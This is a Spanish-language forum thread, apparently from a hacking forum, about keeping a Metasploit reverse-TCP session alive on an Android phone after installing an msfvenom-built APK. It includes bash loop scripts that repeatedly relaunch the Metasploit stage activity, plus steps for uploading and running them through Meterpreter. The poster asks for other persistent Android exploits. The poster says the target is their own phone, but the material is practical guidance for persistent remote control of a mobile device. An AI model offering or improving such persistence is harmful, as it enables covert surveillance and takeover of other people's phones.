Buenas noches, he estado probando vulnerar mi celular android de diferentes formas y por el momento la de crear una apk con msfvenom parece la mas conveniente (si alguien conoce alguna mejor por favor resomendarla),
el problema es el siguiente: al abrir la APK se hace la conexion reverse TCP con metasploit correctamente pero, al cabo de 2 minutos, o al bloquear el celular, se cierra la sesion,
he estado leyendo e intente hacer una persistencia con el siguiente script:
Código:
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
el problema es que sigue sin funcionar, al bloquear el celular, reiniciar el telefono, o por nada la sesion se sigue cerrando, mi idea era poder descargar la APK y que ya quede una sesion permanente mandando la informacion de los puertos, no se si existe alguna manera, o si deberia plantear el problema desde otro punto de vista, muchas gracias!
Creas la persistencia aqui te dejo el codigo:
#!/bin/bash
while true:
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 15
done
En la shell del sistema vulnerado te mueves hasta la ruta:
/data/data/com.metasploit.stage/files
Para luego proceder a subir la persistencia (comando upload desde meterpreter) y correrla con el comando:
sh recur.sh
La persistencia deberia funcionar aún con el reinicio del sistema.
No funciona si el móvil no está rooteado. Y a partir de Nougat (7.1.2) ni hablar.
@AXCESS (https://underc0de.org/foro/index.php?action=profile;u=89884) lo he probado y sigue caducandose la sesión, hasta he probado ponerlo en el ini.d, luego de ponerlo en sdcard/download para que inicie el script con el movil, pero no hay manera, existe alguna otra alternativa para que no se cierre la sesion?
O algun otro tipo de vulnerabildiad para android que sea persistente?
Muchas gracias